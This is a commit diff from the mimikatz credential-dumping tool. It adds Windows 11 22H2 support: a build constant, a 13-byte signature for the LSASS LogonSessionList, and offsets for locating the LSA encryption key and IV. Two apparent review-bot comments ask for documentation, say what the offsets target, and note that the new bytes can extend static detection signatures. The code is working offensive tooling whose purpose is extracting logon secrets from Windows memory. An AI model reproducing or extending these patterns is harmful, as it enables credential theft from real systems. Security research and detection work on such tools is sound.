Merge pull request #432 from SLiNv/master

Added Windows 11's Structure offset and updated key+IV offset for decryption
Benjamin DELPY 2023-11-09 23:47:40 +01:00 committed by GitHub
commit ac143b45a5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 4 additions and 0 deletions


@ -120,6 +120,7 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define KULL_M_WIN_BUILD_10_20H2 19042 #define KULL_M_WIN_BUILD_10_20H2 19042
#define KULL_M_WIN_BUILD_10_21H2 19044 #define KULL_M_WIN_BUILD_10_21H2 19044
#define KULL_M_WIN_BUILD_2022 20348 #define KULL_M_WIN_BUILD_2022 20348
#define KULL_M_WIN_BUILD_11_22H2 22621
#define KULL_M_WIN_MIN_BUILD_XP 2500 #define KULL_M_WIN_MIN_BUILD_XP 2500
#define KULL_M_WIN_MIN_BUILD_2K3 3000 #define KULL_M_WIN_MIN_BUILD_2K3 3000


@ -20,6 +20,7 @@ KULL_M_PATCH_GENERIC PTRN_WIN8_LsaInitializeProtectedMemory_KeyRef[] = { // Init
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN8_LsaInitializeProtectedMemory_KEY), PTRN_WIN8_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {62, -70, 23}}, {KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN8_LsaInitializeProtectedMemory_KEY), PTRN_WIN8_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {62, -70, 23}},
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN10_LsaInitializeProtectedMemory_KEY), PTRN_WN10_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {61, -73, 16}}, {KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN10_LsaInitializeProtectedMemory_KEY), PTRN_WN10_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {61, -73, 16}},
{KULL_M_WIN_BUILD_10_1809, {sizeof(PTRN_WN10_LsaInitializeProtectedMemory_KEY), PTRN_WN10_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {67, -89, 16}}, {KULL_M_WIN_BUILD_10_1809, {sizeof(PTRN_WN10_LsaInitializeProtectedMemory_KEY), PTRN_WN10_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {67, -89, 16}},
{KULL_M_WIN_BUILD_11_22H2, {sizeof(PTRN_WN10_LsaInitializeProtectedMemory_KEY), PTRN_WN10_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {71, -89, 16}},
}; };
#elif defined _M_IX86 #elif defined _M_IX86
BYTE PTRN_WALL_LsaInitializeProtectedMemory_KEY[] = {0x6a, 0x02, 0x6a, 0x10, 0x68}; BYTE PTRN_WALL_LsaInitializeProtectedMemory_KEY[] = {0x6a, 0x02, 0x6a, 0x10, 0x68};
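Review bot: The added `KULL_M_WIN_BUILD_11_22H2` row carries the bare triple `{71, -89, 16}` with no record of what each offset addresses or which binary it was checked against; it differs from the `KULL_M_WIN_BUILD_10_1809` row only in the first value. A trailing comment such as `// 22H2 (build 22621): first offset moved, other two unchanged from 1809` would make that visible to the next maintainer. For readers using this file as a reference, the row changes nothing about the prerequisite: judging by the commit title and the table name, it exists to locate key material inside the LSA process, so controls that block or log reads of that process apply to 22H2 as to earlier builds. The array opens above the hunk and the code that consumes the offsets is not shown.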


@ -19,6 +19,7 @@ BYTE PTRN_WN6x_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0
BYTE PTRN_WN1703_LogonSessionList[] = {0x33, 0xff, 0x45, 0x89, 0x37, 0x48, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74}; BYTE PTRN_WN1703_LogonSessionList[] = {0x33, 0xff, 0x45, 0x89, 0x37, 0x48, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
BYTE PTRN_WN1803_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74}; BYTE PTRN_WN1803_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
BYTE PTRN_WN11_LogonSessionList[] = {0x45, 0x89, 0x34, 0x24, 0x4c, 0x8b, 0xff, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74}; BYTE PTRN_WN11_LogonSessionList[] = {0x45, 0x89, 0x34, 0x24, 0x4c, 0x8b, 0xff, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
BYTE PTRN_WN11_22H2_LogonSessionList[] = {0x45, 0x89, 0x37, 0x4c, 0x8b, 0xf7, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x0f, 0x84};
KULL_M_PATCH_GENERIC LsaSrvReferences[] = { KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, 0}}, {KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, 0}},
{KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, -45}}, {KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, -45}},
@ -31,6 +32,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
{KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_WN1803_LogonSessionList), PTRN_WN1803_LogonSessionList}, {0, NULL}, {23, -4}}, {KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_WN1803_LogonSessionList), PTRN_WN1803_LogonSessionList}, {0, NULL}, {23, -4}},
{KULL_M_WIN_BUILD_10_1903, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {23, -4}}, {KULL_M_WIN_BUILD_10_1903, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {23, -4}},
{KULL_M_WIN_BUILD_2022, {sizeof(PTRN_WN11_LogonSessionList), PTRN_WN11_LogonSessionList}, {0, NULL}, {24, -4}}, {KULL_M_WIN_BUILD_2022, {sizeof(PTRN_WN11_LogonSessionList), PTRN_WN11_LogonSessionList}, {0, NULL}, {24, -4}},
{KULL_M_WIN_BUILD_11_22H2, {sizeof(PTRN_WN11_22H2_LogonSessionList), PTRN_WN11_22H2_LogonSessionList}, {0, NULL}, {27, -4}},
}; };
#elif defined(_M_IX86) #elif defined(_M_IX86)
BYTE PTRN_WN51_LogonSessionList[] = {0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84}; BYTE PTRN_WN51_LogonSessionList[] = {0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84};
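Review bot: `PTRN_WN11_22H2_LogonSessionList` is added without any comment, and its name sits awkwardly beside `PTRN_WN11_LogonSessionList`, which the table binds to `KULL_M_WIN_BUILD_2022` rather than to a Windows 11 build. A one-line comment above the array, for example `// Windows 11 22H2 (build 22621); ends in a near jump (0x0f 0x84) where the older patterns end in 0x74`, would explain why a separate pattern and the `{27, -4}` offsets in the second hunk were needed. Because the array is a compile-time constant, the 13 bytes should appear verbatim in an unmodified build, so static signatures that match this tool by its pattern tables can be extended with the new sequence. The `LsaSrvReferences` table begins and ends partly outside the hunks shown.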